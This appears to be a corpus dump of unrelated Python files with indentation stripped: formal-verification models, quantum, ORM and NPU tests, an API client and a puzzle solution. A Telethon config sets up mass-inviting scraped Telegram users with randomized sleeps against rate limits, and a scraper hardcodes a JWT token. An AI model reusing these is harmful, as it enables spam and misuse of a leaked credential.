def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
symbols = frozenset([pc, x, y, z])
n_locs = 5
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
for l in range(n_locs):
n = ints[l]
pcs.append(mgr.Equals(pc, n))
x_pcs.append(mgr.Equals(x_pc, n))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
# initial location.
init = pcs[0]
# control flow graph.
cfg = mgr.And(
# pc = -1 : -1,
mgr.Implies(pcend, x_pcend),
# pc = 0 & !(y >= 1) : -1,
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend),
# pc = 0 & y >= 1 : 1,
mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]),
# pc = 1 & !(z >= 1) : -1,
mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend),
# pc = 1 & z >= 1 : 2,
mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]),
# pc = 2 & !(x >= 0) : -1,
mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend),
# pc = 2 & x >= 0 : 3,
mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]),
# pc = 3 : 4,
mgr.Implies(pcs[3], x_pcs[4]),
# pc = 4 : 2,
mgr.Implies(pcs[4], x_pcs[2]))
# transition labels.
labels = mgr.And(
# (pc = -1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = 1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = 2) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = 3) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 3 & pc' = 4) -> (x' = y*z - 1 & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])),
mgr.Equals(x_y, y), mgr.Equals(x_z, z))),
# (pc = 4 & pc' = 2) -> (x' = x & y' = y+1 & z' = z),
mgr.Implies(
mgr.And(pcs[4], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])),
mgr.Equals(x_z, z))))
# transition relation.
trans = mgr.And(cfg, labels)
# fairness.
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
symbs = frozenset([pc, x, y, z])
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
res = []
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_3 = mgr.Int(3)
stutter = mgr.Equals(x_y, y)
loc0 = Location(env, mgr.GE(y, i_0))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(y, i_1)))
loc1 = Location(env, mgr.GE(y, i_1))
loc1.set_progress(2, mgr.Equals(x_y, mgr.Plus(y, i_1)))
loc2 = Location(env, mgr.GE(y, i_2))
loc2.set_progress(0, mgr.Equals(x_y, y))
h_y = Hint("h_y1", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1, loc2])
res.append(h_y)
stutter = mgr.Equals(x_x, x)
loc = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)),
stutterT=stutter)
loc.set_progress(0, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_2)))
h_x = Hint("h_x1", env, frozenset([x]), symbs)
h_x.set_locs([loc])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_3))
loc0.set_progress(0, mgr.GT(x_z, z))
h_z = Hint("h_z1", env, frozenset([z]), symbs)
h_z.set_locs([loc0])
res.append(h_z)
stutter = mgr.Equals(x_x, x)
loc0 = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, i_1)))
h_x = Hint("h_x2", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(y, i_3))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(y, i_1)))
loc1 = Location(env, mgr.GE(y, i_3), mgr.GE(x, i_2))
loc1.set_progress(0, mgr.Equals(x_y, mgr.Plus(y, x)))
h_y = Hint("h_y3", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y)))
h_x = Hint("h_x3", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(y, i_3))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(y, i_1)))
loc1 = Location(env, mgr.GE(y, i_3))
loc1.set_progress(2, mgr.Equals(x_y, y))
loc2 = Location(env, mgr.GE(y, i_3))
loc2.set_progress(2, mgr.Equals(x_y, mgr.Plus(y, i_1)))
h_y = Hint("h_y4", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1, loc2])
res.append(h_y)
return frozenset(res)
|
the-stack_0_6561 | from . httptools import Http
from . task import Task
class Client(object):
"""
:return: encoder object
"""
def __init__(self, api_key, api_url=None, version=None):
self.api_key = api_key
self.api_url = api_url if api_url else 'https://api.qencode.com/'
self.version = version if version else 'v1'
self.connect = Http(self.version, self.api_url)
self.access_token = None
self.expire = None
self.error = None
self.code = None
self.message = ''
self._get_access_token()
def create_task(self, **kwargs):
return Task(self.access_token, self.connect, **kwargs)
def refresh_access_token(self, **kwargs):
response = self.connect.request('access_token', dict(api_key=self.api_key))
if not response['error']:
self.access_token = response['token']
self.expire = response['expire']
else:
self.error = response['error']
self.code = response['error']
self.message = response.get('message')
def _get_access_token(self):
response = self.connect.request('access_token', dict(api_key=self.api_key))
if not response['error']:
self.access_token = response['token']
self.expire = response['expire']
else:
self.error = response['error']
self.code = response['error']
self.message = response.get('message')
|
the-stack_0_6562 | #!/usr/bin/env python
from setuptools import setup, find_packages
# versioneer config
import versioneer
versioneer.versionfile_source = 'httpsig/_version.py'
versioneer.versionfile_build = 'httpsig/_version.py'
versioneer.tag_prefix = 'v' # tags are like v1.2.0
versioneer.parentdir_prefix = 'httpsig-' # dirname like 'myproject-1.2.0'
# create long description
with open('README.rst') as file:
long_description = file.read()
with open('CHANGELOG.rst') as file:
long_description += '\n\n' + file.read()
setup(
name='httpsig',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description="Secure HTTP request signing using the HTTP Signature draft specification",
long_description=long_description,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='http,authorization,api,web',
author='Adam Knight',
author_email='[email protected]',
url='https://github.com/ahknight/httpsig',
license='MIT',
packages=find_packages(),
include_package_data=True,
zip_safe=True,
install_requires=['pycrypto', 'cryptography>=1.7.1','six'],
test_suite="httpsig.tests",
)
|
the-stack_0_6565 | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
import unittest
import numpy as np
from parameterized import parameterized
from scipy.linalg import expm
from scipy import sparse
from qiskit.transpiler import PassManager
from test.aqua.common import QiskitAquaTestCase
from qiskit import BasicAer
from qiskit.aqua import QuantumInstance
from qiskit.aqua.utils import decimal_to_binary
from qiskit.aqua.algorithms import IQPE
from qiskit.aqua.algorithms import ExactEigensolver
from qiskit.aqua.operators import WeightedPauliOperator, MatrixOperator, op_converter
from qiskit.aqua.components.initial_states import Custom
X = np.array([[0, 1], [1, 0]])
Y = np.array([[0, -1j], [1j, 0]])
Z = np.array([[1, 0], [0, -1]])
_I = np.array([[1, 0], [0, 1]])
h1 = X + Y + Z + _I
qubit_op_simple = MatrixOperator(matrix=h1)
qubit_op_simple = op_converter.to_weighted_pauli_operator(qubit_op_simple)
pauli_dict = {
'paulis': [
{"coeff": {"imag": 0.0, "real": -1.052373245772859}, "label": "II"},
{"coeff": {"imag": 0.0, "real": 0.39793742484318045}, "label": "IZ"},
{"coeff": {"imag": 0.0, "real": -0.39793742484318045}, "label": "ZI"},
{"coeff": {"imag": 0.0, "real": -0.01128010425623538}, "label": "ZZ"},
{"coeff": {"imag": 0.0, "real": 0.18093119978423156}, "label": "XX"}
]
}
qubit_op_h2_with_2_qubit_reduction = WeightedPauliOperator.from_dict(pauli_dict)
pauli_dict_zz = {
'paulis': [
{"coeff": {"imag": 0.0, "real": 1.0}, "label": "ZZ"}
]
}
qubit_op_zz = WeightedPauliOperator.from_dict(pauli_dict_zz)
class TestIQPE(QiskitAquaTestCase):
"""IQPE tests."""
@parameterized.expand([
[qubit_op_simple, 'qasm_simulator', 1, 5],
[qubit_op_zz, 'statevector_simulator', 1, 1],
[qubit_op_h2_with_2_qubit_reduction, 'statevector_simulator', 1, 6],
])
def test_iqpe(self, qubit_op, simulator, num_time_slices, num_iterations):
self.algorithm = 'IQPE'
self.log.debug('Testing IQPE')
self.qubit_op = qubit_op
exact_eigensolver = ExactEigensolver(self.qubit_op, k=1)
results = exact_eigensolver.run()
self.ref_eigenval = results['eigvals'][0]
self.ref_eigenvec = results['eigvecs'][0]
self.log.debug('The exact eigenvalue is: {}'.format(self.ref_eigenval))
self.log.debug('The corresponding eigenvector: {}'.format(self.ref_eigenvec))
state_in = Custom(self.qubit_op.num_qubits, state_vector=self.ref_eigenvec)
iqpe = IQPE(self.qubit_op, state_in, num_time_slices, num_iterations,
expansion_mode='suzuki', expansion_order=2, shallow_circuit_concat=True)
backend = BasicAer.get_backend(simulator)
quantum_instance = QuantumInstance(backend, shots=100)
result = iqpe.run(quantum_instance)
self.log.debug('top result str label: {}'.format(result['top_measurement_label']))
self.log.debug('top result in decimal: {}'.format(result['top_measurement_decimal']))
self.log.debug('stretch: {}'.format(result['stretch']))
self.log.debug('translation: {}'.format(result['translation']))
self.log.debug('final eigenvalue from IQPE: {}'.format(result['energy']))
self.log.debug('reference eigenvalue: {}'.format(self.ref_eigenval))
self.log.debug('ref eigenvalue (transformed): {}'.format(
(self.ref_eigenval + result['translation']) * result['stretch'])
)
self.log.debug('reference binary str label: {}'.format(decimal_to_binary(
(self.ref_eigenval.real + result['translation']) * result['stretch'],
max_num_digits=num_iterations + 3,
fractional_part_only=True
)))
np.testing.assert_approx_equal(result['energy'], self.ref_eigenval.real, significant=2)
if __name__ == '__main__':
unittest.main()
|
the-stack_0_6566 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socks
import datetime
from telethon.tl.types import UserStatusOnline
from telethon.tl.types import UserStatusRecently
from telethon.tl.types import UserStatusLastWeek
from telethon.tl.types import UserStatusLastMonth
from telethon.tl.types import UserStatusEmpty
# Your Telegram API_ID here
tg_api_id = 0
# Your Telegram API_HASH here
tg_api_hash = 'Your Telegram API_HASH here'
# Proxy configuration here, or leave it as None
#proxy = None
proxy = (socks.SOCKS5, 'localhost', 1088)
# multi-client-session keys
client_sessions = [
'YOUR_SESSION_KEYS',
]
# Existing group list
existing_groups = []
# source list (group or supergroup)
source_groups = [
'ENTITY_USERNAME',
]
# destination (group or supergroup)
destination_group = 'ENTITY_USERNAME'
# Filter of UserStatus
# Tips: DO NOT put `UserStatusOffline` in this
filter_user_status_types = [
UserStatusOnline,
UserStatusRecently,
UserStatusLastWeek,
# UserStatusLastMonth,
# UserStatusEmpty,
]
# UserStatusOffline `was_online` limit
filter_user_status_offline_was_online_min = datetime.datetime.now() - datetime.timedelta(weeks=4)
filter_user_status_offline_was_online_max = None
# if display_name is too long, skip
filter_user_display_name_too_much_words_limit = 25
# random relax during inviting actions
rd_sleep_min = 3
rd_sleep_max = 10
|
the-stack_0_6568 | import sqlalchemy as sa
from sqlalchemy import ForeignKey
from sqlalchemy import func
from sqlalchemy import Integer
from sqlalchemy import testing
from sqlalchemy.orm import relationship
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from test.orm import _fixtures
class GenerativeQueryTest(fixtures.MappedTest):
run_inserts = "once"
run_deletes = None
@classmethod
def define_tables(cls, metadata):
Table(
"foo",
metadata,
Column("id", Integer, sa.Sequence("foo_id_seq"), primary_key=True),
Column("bar", Integer),
Column("range", Integer),
)
@classmethod
def fixtures(cls):
rows = tuple([(i, i % 10) for i in range(100)])
foo_data = (("bar", "range"),) + rows
return dict(foo=foo_data)
@classmethod
def setup_mappers(cls):
foo = cls.tables.foo
class Foo(cls.Basic):
pass
cls.mapper_registry.map_imperatively(Foo, foo)
def test_selectby(self):
Foo = self.classes.Foo
res = fixture_session().query(Foo).filter_by(range=5)
assert res.order_by(Foo.bar)[0].bar == 5
assert res.order_by(sa.desc(Foo.bar))[0].bar == 95
def test_slice(self):
Foo = self.classes.Foo
sess = fixture_session()
query = sess.query(Foo).order_by(Foo.id)
orig = query.all()
assert query[1] == orig[1]
assert list(query[10:20]) == orig[10:20]
assert list(query[10:]) == orig[10:]
assert list(query[:10]) == orig[:10]
assert list(query[:10]) == orig[:10]
assert list(query[5:5]) == orig[5:5]
assert list(query[10:40:3]) == orig[10:40:3]
# negative slices and indexes are deprecated and are tested
# in test_query.py and test_deprecations.py
assert query[10:20][5] == orig[10:20][5]
def test_aggregate(self):
foo, Foo = self.tables.foo, self.classes.Foo
sess = fixture_session()
query = sess.query(Foo)
assert query.count() == 100
assert sess.query(func.min(foo.c.bar)).filter(
foo.c.bar < 30
).one() == (0,)
assert sess.query(func.max(foo.c.bar)).filter(
foo.c.bar < 30
).one() == (29,)
eq_(
query.filter(foo.c.bar < 30)
.with_entities(sa.func.max(foo.c.bar))
.scalar(),
29,
)
@testing.fails_if(
lambda: testing.against("mysql+mysqldb")
and testing.db.dialect.dbapi.version_info[:4] == (1, 2, 1, "gamma"),
"unknown incompatibility",
)
def test_aggregate_1(self):
foo = self.tables.foo
query = fixture_session().query(func.sum(foo.c.bar))
assert query.filter(foo.c.bar < 30).one() == (435,)
@testing.fails_on("firebird", "FIXME: unknown")
@testing.fails_on(
"mssql",
"AVG produces an average as the original column type on mssql.",
)
def test_aggregate_2(self):
foo = self.tables.foo
query = fixture_session().query(func.avg(foo.c.bar))
avg = query.filter(foo.c.bar < 30).one()[0]
eq_(float(round(avg, 1)), 14.5)
@testing.fails_on(
"mssql",
"AVG produces an average as the original column type on mssql.",
)
def test_aggregate_3(self):
foo, Foo = self.tables.foo, self.classes.Foo
query = fixture_session().query(Foo)
avg_f = (
query.filter(foo.c.bar < 30)
.with_entities(sa.func.avg(foo.c.bar))
.scalar()
)
eq_(float(round(avg_f, 1)), 14.5)
avg_o = (
query.filter(foo.c.bar < 30)
.with_entities(sa.func.avg(foo.c.bar))
.scalar()
)
eq_(float(round(avg_o, 1)), 14.5)
def test_filter(self):
Foo = self.classes.Foo
query = fixture_session().query(Foo)
assert query.count() == 100
assert query.filter(Foo.bar < 30).count() == 30
res2 = query.filter(Foo.bar < 30).filter(Foo.bar > 10)
assert res2.count() == 19
def test_order_by(self):
Foo = self.classes.Foo
query = fixture_session().query(Foo)
assert query.order_by(Foo.bar)[0].bar == 0
assert query.order_by(sa.desc(Foo.bar))[0].bar == 99
def test_offset_order_by(self):
Foo = self.classes.Foo
query = fixture_session().query(Foo)
assert list(query.order_by(Foo.bar).offset(10))[0].bar == 10
def test_offset(self):
Foo = self.classes.Foo
query = fixture_session().query(Foo)
assert len(list(query.limit(10))) == 10
class GenerativeTest2(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table("table1", metadata, Column("id", Integer, primary_key=True))
Table(
"table2",
metadata,
Column("t1id", Integer, ForeignKey("table1.id"), primary_key=True),
Column("num", Integer, primary_key=True),
)
@classmethod
def setup_mappers(cls):
table2, table1 = cls.tables.table2, cls.tables.table1
class Obj1(cls.Basic):
pass
class Obj2(cls.Basic):
pass
cls.mapper_registry.map_imperatively(Obj1, table1)
cls.mapper_registry.map_imperatively(Obj2, table2)
@classmethod
def fixtures(cls):
return dict(
table1=(("id",), (1,), (2,), (3,), (4,)),
table2=(
("num", "t1id"),
(1, 1),
(2, 1),
(3, 1),
(4, 2),
(5, 2),
(6, 3),
),
)
def test_distinct_count(self):
table2, Obj1, table1 = (
self.tables.table2,
self.classes.Obj1,
self.tables.table1,
)
query = fixture_session().query(Obj1)
eq_(query.count(), 4)
res = query.filter(
sa.and_(table1.c.id == table2.c.t1id, table2.c.t1id == 1)
)
eq_(res.count(), 3)
res = query.filter(
sa.and_(table1.c.id == table2.c.t1id, table2.c.t1id == 1)
).distinct()
eq_(res.count(), 1)
class RelationshipsTest(_fixtures.FixtureTest):
run_setup_mappers = "once"
run_inserts = "once"
run_deletes = None
@classmethod
def setup_mappers(cls):
addresses, Order, User, Address, orders, users = (
cls.tables.addresses,
cls.classes.Order,
cls.classes.User,
cls.classes.Address,
cls.tables.orders,
cls.tables.users,
)
cls.mapper_registry.map_imperatively(
User,
users,
properties={
"orders": relationship(
cls.mapper_registry.map_imperatively(
Order,
orders,
properties={
"addresses": relationship(
cls.mapper_registry.map_imperatively(
Address, addresses
)
)
},
)
)
},
)
def test_join(self):
"""Query.join"""
User, Address = self.classes.User, self.classes.Address
session = fixture_session()
q = (
session.query(User)
.join("orders", "addresses")
.filter(Address.id == 1)
)
eq_([User(id=7)], q.all())
def test_outer_join(self):
"""Query.outerjoin"""
Order, User, Address = (
self.classes.Order,
self.classes.User,
self.classes.Address,
)
session = fixture_session()
q = (
session.query(User)
.outerjoin("orders", "addresses")
.filter(sa.or_(Order.id == None, Address.id == 1))
) # noqa
eq_(set([User(id=7), User(id=8), User(id=10)]), set(q.all()))
def test_outer_join_count(self):
"""test the join and outerjoin functions on Query"""
Order, User, Address = (
self.classes.Order,
self.classes.User,
self.classes.Address,
)
session = fixture_session()
q = (
session.query(User)
.outerjoin("orders", "addresses")
.filter(sa.or_(Order.id == None, Address.id == 1))
) # noqa
eq_(q.count(), 4)
def test_from(self):
users, Order, User, Address, orders, addresses = (
self.tables.users,
self.classes.Order,
self.classes.User,
self.classes.Address,
self.tables.orders,
self.tables.addresses,
)
session = fixture_session()
sel = users.outerjoin(orders).outerjoin(
addresses, orders.c.address_id == addresses.c.id
)
q = (
session.query(User)
.select_from(sel)
.filter(sa.or_(Order.id == None, Address.id == 1))
) # noqa
eq_(set([User(id=7), User(id=8), User(id=10)]), set(q.all()))
class CaseSensitiveTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table("Table1", metadata, Column("ID", Integer, primary_key=True))
Table(
"Table2",
metadata,
Column("T1ID", Integer, ForeignKey("Table1.ID"), primary_key=True),
Column("NUM", Integer, primary_key=True),
)
@classmethod
def setup_mappers(cls):
Table2, Table1 = cls.tables.Table2, cls.tables.Table1
class Obj1(cls.Basic):
pass
class Obj2(cls.Basic):
pass
cls.mapper_registry.map_imperatively(Obj1, Table1)
cls.mapper_registry.map_imperatively(Obj2, Table2)
@classmethod
def fixtures(cls):
return dict(
Table1=(("ID",), (1,), (2,), (3,), (4,)),
Table2=(
("NUM", "T1ID"),
(1, 1),
(2, 1),
(3, 1),
(4, 2),
(5, 2),
(6, 3),
),
)
def test_distinct_count(self):
Table2, Obj1, Table1 = (
self.tables.Table2,
self.classes.Obj1,
self.tables.Table1,
)
q = fixture_session().query(Obj1)
assert q.count() == 4
res = q.filter(
sa.and_(Table1.c.ID == Table2.c.T1ID, Table2.c.T1ID == 1)
)
assert res.count() == 3
res = q.filter(
sa.and_(Table1.c.ID == Table2.c.T1ID, Table2.c.T1ID == 1)
).distinct()
eq_(res.count(), 1)
|
the-stack_0_6569 | # Copyright (c) 2020, Huawei Technologies.All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import sys
from common_utils import TestCase, run_tests
from common_device_type import dtypes, instantiate_device_type_tests
from util_test import create_common_tensor
class TestHardShrink(TestCase):
def generate_data(self, min_d, max_d, shape, dtype):
input_x = np.random.uniform(min_d, max_d, shape).astype(dtype)
npu_input = torch.from_numpy(input_x)
return npu_input
def cpu_op_exec(self, input_x, lambd):
output = torch.nn.functional.hardshrink(input_x, lambd=lambd)
output = output.numpy()
return output.astype(np.float32)
def npu_op_exec(self, input_x, lambd):
input1 = input_x.to("npu")
output = torch.nn.functional.hardshrink(input1, lambd=lambd)
output = output.to("cpu")
output = output.numpy()
return output
def test_hardshrink_3_3_float32(self, device):
input_x1 = self.generate_data(-1, 1, (3, 3), np.float32)
cpu_output1 = self.cpu_op_exec(input_x1, 0.5)
npu_output1 = self.npu_op_exec(input_x1, 0.5)
self.assertRtolEqual(cpu_output1, npu_output1)
def test_hardshrink_100_100_float32(self, device):
input_x1 = self.generate_data(-1, 1, (100, 100), np.float32)
cpu_output1 = self.cpu_op_exec(input_x1, 0.5)
npu_output1 = self.npu_op_exec(input_x1, 0.5)
self.assertRtolEqual(cpu_output1, npu_output1)
def test_hardshrink_3_3_float16(self, device):
input_x1 = self.generate_data(-1, 1, (3, 3), np.float16)
input_x1_cpu = input_x1.float()
cpu_output1 = self.cpu_op_exec(input_x1_cpu, 0.5).astype(np.float16)
npu_output1 = self.npu_op_exec(input_x1, 0.5)
self.assertRtolEqual(cpu_output1, npu_output1)
def test_hardshrink_100_100_float16(self, device):
input_x1 = self.generate_data(-1, 1, (100, 100), np.float16)
input_x1_cpu = input_x1.float()
cpu_output1 = self.cpu_op_exec(input_x1_cpu, 0.5).astype(np.float16)
npu_output1 = self.npu_op_exec(input_x1, 0.5)
self.assertRtolEqual(cpu_output1, npu_output1)
def test_hardshrink_10_10_10_10_float32(self, device):
input_x1 = self.generate_data(-1, 1, (10, 10, 10, 10), np.float32)
cpu_output1 = self.cpu_op_exec(input_x1, 0.5)
npu_output1 = self.npu_op_exec(input_x1, 0.5)
self.assertRtolEqual(cpu_output1, npu_output1)
instantiate_device_type_tests(TestHardShrink, globals(), except_for='cpu')
if __name__ == "__main__":
run_tests() |
the-stack_0_6571 | # a(n) is the amount of individuals by day n
# q(n) corresponds to the number of zeroes in day n
n = 256
qmem = [-1 for i in range(n + 10)]
def a(n):
if n == 0: return 1
return a(n-1) + q(n-1)
def q(n):
if n <= 9: return 1 if n == 8 else 0
if qmem[n] != -1: return qmem[n]
qmem[n] = q(n-7) + q(n-9)
return qmem[n]
with open('input') as f:
initial_fish = list(map(int, f.read().split(',')))
s = 0
for fish in initial_fish:
s += a(n + 8 - fish)
print(s)
|
the-stack_0_6572 | """Management command for disabling an extension."""
from __future__ import unicode_literals
from django.core.management.base import CommandError
from django.utils.translation import ugettext as _
from djblets.util.compat.django.core.management.base import BaseCommand
from reviewboard.extensions.base import get_extension_manager
class Command(BaseCommand):
"""Management command for disabling an extension."""
help = _('Disables an extension.')
def add_arguments(self, parser):
"""Add arguments to the command.
Args:
parser (argparse.ArgumentParser):
The argument parser for the command.
"""
parser.add_argument(
'extension_ids',
metavar='EXTENSION_ID',
nargs='*',
help=_('The ID of the extension to disable.'))
def handle(self, *args, **options):
"""Handle the command.
Args:
*args (tuple):
The name of the check to resolve.
**options (dict, unused):
Options parsed on the command line. For this command, no
options are available.
Raises:
django.core.management.CommandError:
There was an error with arguments or enabling the extension.
"""
extension_ids = options['extension_ids']
if not extension_ids:
raise CommandError(
_('You must specify an extension ID to disable.'))
extension_mgr = get_extension_manager()
for extension_id in extension_ids:
try:
extension_mgr.disable_extension(extension_id)
except Exception as e:
raise CommandError(
_('Unexpected error disabling extension %s: %s')
% (extension_id, e))
|
the-stack_0_6574 | import csv
import requests
import json
from pprint import pprint
import pandas as pd
from csv import DictWriter
# initializing a fixed token
class EnvVariables:
"""
Initializing env variables
"""
t = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjozLCJpYXQiOjE2MzcxNDI2NjZ9.AkLL2rMRyvSkRoWEg2qbMMvv28-Y94-Hth4Qyh5Nl4c"
base_url = "https://api.prod.sb.codebuckets.in/v3/"
auth = 'auth/oauth'
me = ''
# payload to get the messages as a response
payload = {
"last_id": 0,
"selectedIndex": 0,
"token": t
}
msg_keys = ['id', 'type', 'parent_id', 'updated_at', 'idd', 'data']
csv_keys = [
'd_coords', 'd_link_img', 'd_link_title', 'd_uri', 'id', 'idd', 'parent_id', 'type', 'updated_at'
]
class Parser:
"""
The class where the parsing of the JSON string happens
"""
def __init__(self) -> None:
self.keys = self.thread_keys()
self.thread_list = []
#self.thread_parse_handler()
"""
Action Functions that make changes to values without returning
"""
def thread_parse_handler(self, payload):
self.thread_list = []
# parse thread by thread
for thread in payload:
self.thread_parser(thread)
# check if there are any children keys
try:
thread['children']
except KeyError:
#print("This thread has no children")
continue
for child in thread['children']:
self.thread_parser(child)
return self.thread_list
def thread_parser(self, thread):
thread_dict = {}
for key in self.keys:
# if key is data, then update the dict with the returned dict from
# data parser subroutine
if key == 'data':
thread_dict.update(self.data_parser(thread[key]))
else:
thread_dict[key] = thread[key]
self.thread_list.append(thread_dict)
"""
Return functions, ones that take an input do something and return a value
"""
def data_parser(self,data_payload):
data_dict = {}
for key in data_payload.keys():
data_dict["d_{}".format(key)] = data_payload[key]
return data_dict
# as much as i dislike it, for MVP we are hardcoding the keys
def thread_keys(self):
msg_keys = ['id', 'type', 'parent_id', 'updated_at', 'idd', 'data']
return msg_keys
class Orchestrator(EnvVariables):
"""
"""
def __init__(self) -> None:
self.url = EnvVariables.base_url
self.payload = EnvVariables.payload
self.parser = Parser()
self.orchestrate()
pass
def orchestrate(self):
"""
what runs the orchestrator from inside, and handles pagination when necessary.
"""
start_index = 0
valid_flag = True
length = 1
while valid_flag and length != 0:
valid_flag, jsonstring = self.api_requester(start_index)
print(f"valid run #{start_index/25:n}")
parsed_json = self.request_translator(jsonstring)
thread_list = self.parser.thread_parse_handler(parsed_json)
self.csvwriter(thread_list)
#self.filewriter(thread_list)
#self.sql_loader(thread_list)
#pprint(thread_list)
length = len(thread_list)
#print(f"\n-------------------------- # threads = {length} -------------------------\n")
# call the next page
start_index+=25
def api_requester(self, start_index = 0):
"""
makes the actual api request
"""
self.payload['last_id']=start_index
response = requests.post(url = self.url, data = self.payload)
#print(f"status code: {response.status_code}")
return response.status_code == 200, response.text
